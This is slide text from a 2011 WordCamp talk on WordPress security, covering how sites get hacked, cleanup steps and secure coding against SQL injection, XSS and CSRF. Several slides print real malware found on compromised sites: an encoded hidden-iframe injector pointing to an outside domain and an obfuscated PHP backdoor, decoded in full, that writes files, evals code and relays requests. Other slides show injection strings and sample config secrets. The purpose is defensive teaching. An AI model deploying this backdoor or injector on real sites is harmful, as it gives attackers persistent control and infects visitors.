The 'WordPress Security: Be a Superhero' presentation at WordCamp Raleigh May 2011.

1. Security:
Be a
Superhero
http://johnford.is/
@iamjohnford

2. http://automattic.com/

3. http://vaultpress.com/

5. Superhero
Training

6. Why are
superheroes
needed?

7. Know Your
Enemy

8. Ninjas?

9. http://flic.kr/p/8gKpiG

11. http://flic.kr/p/5AU3Lp

12. Smoking
Asthmatic
Clowns

13. S.A.C.s

14. What do
S.A.C.s do?

17. document.write(unescape('%3C%69%66%72%61%6D
%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C
%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F
%67%6F%2E%70%68%70%3F%73%69%64%3D
%31%37%27%20%77%69%64%74%68%3D
%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F
%69%66%72%61%6D%65%3E'));

18. <iframe src='http://bl4ckst4r.cn/blog/go.php?
sid=17' width='0' height='0'></iframe>

19. <?php eval(base64_decode
("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FM
TCk7IGlmKCFlbXB0eSgkX1BPU1RbJ2RhdGEnXSkpIHsgJHBvc3RbJ2RhdGEnXSA9ICRfUE9TVFsnZGF0YS
ddOyBpZighZW1wdHkoJF9QT1NUWyd1cmwnXSkpIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyd1
cmwnXSk7ICR1cmxzX2FycmF5ID0gdW5zZXJpYWxpemUoJHRtcCk7ICR1cmwgPSBhcnJheV9zaGlmdCgkdX
Jsc19hcnJheSk7IGlmKCFlbXB0eSgkdXJsc19hcnJheSkgQU5EIGNvdW50KCR1cmxzX2FycmF5KT4wKSB7
ICR0bXAgPSBzZXJpYWxpemUoJHVybHNfYXJyYXkpOyAkcG9zdFsndXJsJ10gPSBiYXNlNjRfZW5jb2RlKC
R0bXApOyB9ICR0bXAgPSBwYXJzZV91cmwoJHVybCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBl
Y2hvICJ0cnlpbmcgdG8gdXBkYXRlIGZpbGVbICIuJHRtcFsncGF0aCddLiIgXSB2aWEgRlRQXG4iOyAkZm
lsZSA9ICd0bXAucGhwJzsgJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRwb3N0Wydk
YXRhJ10pKTsgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50Wydjb250ZW50J10pOyAkZnAgPS
Bmb3BlbigkZmlsZSwgJ3cnKTsgZndyaXRlKCRmcCwgJGNvbnRlbnQpOyBmY2xvc2UoJGZwKTsgY2htb2Qo
JGZpbGUsIDA3NzcpOyAkZnAgPSBmb3BlbigkZmlsZSwncicpOyAkcG9zdCA9IGZhbHNlOyB9IGVsc2Ugey
BlY2hvICJTZW5kaW5nIHJlcXVlc3QgdG86ICR1cmwgXG4iOyAkZnAgPSBmYWxzZTsgfSAkY29udGVudCA9
IHJlcXVlc3QoJHVybCwgJHBvc3QsICRmcCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBmY2xvc2
UoJGZwKTsgdW5saW5rKCRmaWxlKTsgfSBpZigkdG1wWydzY2hlbWUnXT09ImZ0cCIgQU5EICRjb250ZW50
IT09ZmFsc2UpIGVjaG8gIkZUUDogVVBEQVRFRFxuIjsgZWxzZSBlY2hvICRkZWxpbS4kY29udGVudDsgfS
BlbHNlIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJHBvc3RbJ2RhdGEnXSk7ICRkYXRhID0gdW5zZXJpYWxp
emUoJHRtcCk7IGlmKGVtcHR5KCRkYXRhKSBPUiAhaXNfYXJyYXkoJGRhdGEpKSB7IGV4aXQoIlNvbWUgZX
Jyb3Igd2hpbGUgc2F2aW5nOyIpOyB9IGZvcmVhY2ggKCRkYXRhIEFTICRkKSB7IGlmKGRpcm5hbWUoJGRb
J24nXSkhPScuJyBhbmQgIWZpbGVfZXhpc3RzKGRpcm5hbWUoJGRbJ24nXSkpKSB7IG1rZGlyKGRpcm5hbW
UoJGRbJ24nXSksIDA3NzcpOyBjaG1vZChkaXJuYW1lKCRkWyduJ10pLCAwNzc3KTsgfSBpZigkZFsnbidd
PT0nZXYnKSB7IGV2YWwoJGRbJ2MnXSk7IGNvbnRpbnVlOyB9ICRmID0gZm9wZW4oJGRbJ24nXSwgJ3cnKT
sgJGJ5dGVzX3dyaXR0ZW4gPSBmd3JpdGUoJGYsICRkWydjJ10pOyBmY2xvc2UoJGYpOyBpZihmaWxlc2l6
ZSgkZFsnbiddKT4xMCkgeyBlY2hvICJmaWxlOiIuJGRbJ24nXS4iOiBzYXZlZFxuIjsgfSBlbHNlIHsgZW
NobyAic29tZSBlcnJvciBoYXBwZW5zOiAiLiRkWyduJ10uIiBzaXplIGlzOiAiLmZpbGVzaXplKCRkWydu
J10pLiIgYnl0ZXNcbiI7IH0gaWYoIUBjaG1vZCgkZFsnbiddLCAwNzc3KSkgeyBlY2hvICJzb21lIGVycm
9yIHdpdGg6ICIuJGRbJ24nXS4iXG4iOyB9IH0gfSB9IGVsc2UgeyBkaWUoIk5PIERBVEEiKTsgfSBmdW5j

20. <?php
$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST['data']))
{ $post['data'] = $_POST['data']; if(!empty($_POST['url'])) { $tmp = base64_decode
($_POST['url']); $urls_array = unserialize($tmp); $url = array_shift($urls_array);
if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);
$post['url'] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp['scheme']
=="ftp") { echo "trying to update file[ ".$tmp['path']." ] via FTPn"; $file =
'tmp.php'; $content = unserialize(base64_decode($post['data'])); $content =
base64_decode($content['content']); $fp = fopen($file, 'w'); fwrite($fp,
$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,'r'); $post =
false; } else { echo "Sending request to: $url n"; $fp = false; } $content =
request($url, $post, $fp); if($tmp['scheme']=="ftp") { fclose($fp); unlink
($file); } if($tmp['scheme']=="ftp" AND $content!==false) echo "FTP: UPDATEDn";
else echo $delim.$content; } else { $tmp = base64_decode($post['data']); $data =
unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error while
saving;"); } foreach ($data AS $d) { if(dirname($d['n'])!='.' and !file_exists
(dirname($d['n']))) { mkdir(dirname($d['n']), 0777); chmod(dirname($d['n']),
0777); } if($d['n']=='ev') { eval($d['c']); continue; } $f = fopen($d['n'], 'w');
$bytes_written = fwrite($f, $d['c']); fclose($f); if(filesize($d['n'])>10) { echo
"file:".$d['n'].": savedn"; } else { echo "some error happens: ".$d['n']." size
is: ".filesize($d['n'])." bytesn"; } if(!@chmod($d['n'], 0777)) { echo "some
error with: ".$d['n']."n"; } } } } else { die("NO DATA"); } function request
($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post
= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,
1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,
CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =
curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }

24. /* WARNING: This file is
protected by copyright
law. To reverse engineer
or decode this file is
strictly prohibited. */

28. Superhero
Checklist

29. Use Strong
Passwords

31. I saw John Ford speak at
WordCamp Raleigh 2011
IsJFs@WCR2k11

32. I saw the awesome, loving,
generous, compassionate,
handsome, courteous,
thoughtful, modest John Ford
speak at WordCamp
Raleigh 2011
IstalgchctmJFs@WCR2k11

33. Keep
WordPress
Updated

35. Keep
Themes &
Plugins
Updated

39. eval(gzuncompress(base64_decode('eJzcvdtyHMmSIPYOs/6H7Jo
+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2pMkmnHZKa10
YN2fqX/
QL8gv0RERmRmASC7e6Ztjp0mKuPi4eHh4eER4eEezLZnQSjOxYcgzdJtP0gidym2z8+Pnzw9Oj/
fcZpOvSX8IJuusyyOmqvFqr6z4/ytE0ReuPaFs10v5u45f3ICALuOvCyIIwW6Pv/oxctVItK0vuN8/
bVTUQBSdBFoZMv56vVM+O1u39l3smQtEPRXrycT0XN7kPT81dOne5AwHHvDiQcJbfzqjYbD9sTIbo/
GYuYaCZ7w3WFHJWxBlU5XjLpGiU67782GkFA7iObpeulG9dQ5S9woDd0sTpyX4XoeRM7LJK5hcb8zG
baxBTdJ3Ovt2nGQpFmt4dROhRdHPv46WwQJ/TiO10m2oF/
BDH7s7G0pSjjHXXcya7e3kcBfvZ6KniA061+diMt7zqjfd76qY3vTXnswQ6Kk62maJduqbMMZ7ux94
SQiWyeR0x12nb
+Egcou3XA7L0l1G0674UBCKCKdtuPsOt0dwAeJ7A4Go8kYmhi2mar9cbuDVO0N6HviTgYdzK93221C
atYe93tTSOl0nd87PVmvP5sNuwJTzcR2u91D8uqSMAiz4Xg6ohaGA4LndrwZjmr9/
iyOMicNPor9Wr/mzFwPfhwkgRs2nG9FeCmywHOhOzA8u6lIglntwf1p0npwthDOyp0L5zpeA1H
+uBZpJnzHi9ehH72tZ85UAFvxoEK6mznZIkidLFiKJgyxcFPMv3bcuQuDjYWSpnMaJ5A0AybIADxMg
zi6FFEgIi+vlAjXZ1huAriFAih733UWiZjt1xZZtrrXak3DeN7M3ASAR24T
+L4VRL74gHOo5SbeIrgUrTWkACe5kR9E891M89+uSBL4F/vWwr4+MFjzCLPS+63pg/
st90GDMPVF5gYhYBP5jviwCqFF5LcmUYn+2XIeB8I5FUEmGo4PP/21cykSKDnPgGoN5+L/+6f/
N4oy4USBt8iwSLp0QwdSp4CiyD5mzpVIfBE1nUdBBuVeQ/
LaWzhXgYBOOOkKihIBAdd1EsydGSQk1NaryI0isViGAPoCULDweuo6WBWmm
+vACDppDMWCzE0Rl9gBaq9iP4ESLo6lv/aCxBGRg0MNIymWqxiGBWgwcy/

41. Correct File
Permissions

42. // ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordcamp');
/** MySQL database username */
define('DB_USER', 'wordcamp');
/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

44. /**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/
WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force
all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');

49. http://wiki.mediatemple.net/w/File_Permissions

50. http://wiki.mediatemple.net/w/File_Permissions

51. Maybe be
Obscure

55. Multiple
sites on the
same server

56. What if you
need to
come to the
rescue?

57. Contact the
web host

58. Back up the
exploited
site

59. Change all
passwords
and keys

60. // ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordcamp');
/** MySQL database username */
define('DB_USER', 'wordcamp');
/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

61. /**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/
WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force
all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');

62. Check File
Permissions

63. Remove
Rogue Code

64. http://wordpress.org/extend/plugins/exploit-scanner/

65. Subversion
http://codex.wordpress.org/Installing/
Updating_WordPress_with_Subversion

66. machine:www user$ svn status
? wp-config.php
? .htaccess
X index.php
? wp-content/cache
X wp-content/plugins/akismet
M wp-content/themes/twentyten/404.php
? wp-admin/meta
Performing status on external item at 'wp-content/plugins/akismet'

67. machine:www user$ svn diff wp-content/themes/twentyten/404.php
Index: wp-content/themes/twentyten/404.php
===================================================================
--- wp-content/themes/twentyten/404.php (revision 15819)
+++ wp-content/themes/twentyten/404.php (working copy)
@@ -1,3 +1,5 @@
+<?php echo "<h1>Here's some code that really shouldn't be here</h1>"; ?>
+
<?php
/**
* The template for displaying 404 pages (Not Found).

69. Restore
From
Backup

70. YOU HAZ BACKUP, RIGHT?
http://flic.kr/p/DC3Q

71. Superhero
Developer
Checklist

72. SQL
Injection

73. $wpdb->query(
"UPDATE $wpdb->posts
SET post_title = '$new_title'
WHERE ID = $id"
);
BAD

74. $new_title = "SACed' -- ";
$wpdb->query(
"UPDATE $wpdb->posts
SET post_title = '$new_title'
WHERE ID = $id"
);
BAD

75. $new_title = "SACed' -- ";
$wpdb->query(
"UPDATE $wpdb->posts
SET post_title = 'SACed'
-- '$new_title' WHERE ID = $id"
);
BAD

76. $wpdb->update()
GOOD

77. $wpdb->update(
$wpdb->posts,
array( 'post_title' => $new_title ),
array( 'ID' => $id )
);
GOOD

78. $wpdb->insert( $table, $data );
GOOD

79. $wpdb->prepare()
GOOD

80. $wpdb->prepare(
"SELECT * FROM $wpdb->posts
WHERE post_name = %s OR ID = %d",
$some_name,
$some_id
);
GOOD

81. XSS
Cross-site
Scripting

84. <h1>
<?php echo $title; ?>
</h1>
BAD

85. $title = '<script>jsCode();</script>';
<h1>
<?php echo $title; ?>
</h1>
BAD

86. <h1>
<?php echo esc_html( $title ); ?>
</h1>
GOOD

87. <a
href="#wordcamp"
title="<?php echo $title; ?>">
Link Text
</a>
BAD

88. <?php $title = '" onmouseover="jsCode();'; ?>
<a
href="#wordcamp"
title="<?php echo $title; ?>">
Link Text
</a>
BAD

89. <a
href="#wordcamp"
title="<?php echo esc_attr( $title ); ?>">
Link Text
</a>
GOOD

90. esc_textarea()
GOOD

91. <a href="<?php echo $url; ?>">
Link Text
</a>
BAD

92. <?php $url = 'javascript:jsCode();'; ?>
<a href="<?php echo $url; ?>">
Link Text
</a>
BAD

93. <a href="<?php echo esc_url( $url ); ?>">
Link Text
</a>
GOOD

94. <script>
var foo = '<?php echo $unsafe; ?>';
</script>
BAD

95. <script>
var foo = '<?php echo esc_js( $unsafe ); ?>';
</script>
GOOD

96. wp_filter_kses( $data )
GOOD

97. CSRF
Cross-site
Request
Forgery

98. http://mysite.com/delete-record.php?id=1

99. <img src="http://mysite.com/delete-record.php?id=1" />

100. Nonces
action-, object-, & user-specific
time-limited secret keys

101. wp_nonce_field( 'plugin-action_object' )
GOOD

102. check_admin_referer( 'plugin-action_object' )
GOOD

104. current_user_can( 'edit_posts' )
GOOD

105. Resources
http://codex.wordpress.org/Changing_File_Permissions
http://codex.wordpress.org/Hardening_WordPress
http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/extend/plugins/exploit-scanner/
http://codex.wordpress.org/Function_Reference/wpdb_Class
http://codex.wordpress.org/Data_Validation
http://codex.wordpress.org/WordPress_Nonces

107. http://flic.kr/p/5AU3Lp

108. Thank you!
http://johnford.is/
@iamjohnford